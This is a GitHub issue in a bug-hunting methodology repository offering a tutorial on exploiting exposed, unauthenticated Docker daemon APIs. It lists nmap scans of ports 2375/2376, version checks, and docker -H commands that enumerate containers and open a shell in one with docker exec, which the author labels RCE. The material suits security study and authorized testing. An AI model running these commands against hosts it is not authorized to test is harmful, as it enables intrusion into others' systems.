KathanP19/HowToHunt

Docker API unauthorized RCE

N3T-hunt3r opened this issue · 3 comments

Docker API unauthorized RCE

Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications.
the docker daemon (dockerd) provides an API service used for remote control of docker service the default daemon listen on Unix /var/run/docker.sock and when bound to a public interface can be used by an attacker to compromise container system due to lack of default authentication

Background concept:

  1. The host is running docker: daemon bound to the external interface with no access control or authentication
  2. Attacker uses docker API function to enumerate manage and control the container service the attacker is able to control existing deployed container or create another one.
  3. Docker API provides JSON response containing the output of command issued.

Enumerating docker API services
By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, docker host APIs can be accessed over the public internet.

nmap IP:2375/2376
nmap -p- IP
nmap -Pn -p 2375 IP
nmap -sV -p 2375 IP

To confirm that the docker is service is running on the target we can give the string in the browser and check the response
ex: https://IP:2375
we will receive a response something like this
{"message":"page not found"}
and to confirm the version details we can use this
https://IP:2375/version

The command used to exploit

This command is used to get all the information about the docker container
docker -H IP:2375 info

List all the running containers
docker -H IP:2375 ps

List all the stopped containers
docker -H IP:2375 ps -a

RCE for Docker
command for RCE
docker -H IP:2375 exec -it container_name /bin/bash

Nice material, man. I'll add it and look forward to seeing more. 😄

@all-contributors please add @N3T-hunt3r for tutorial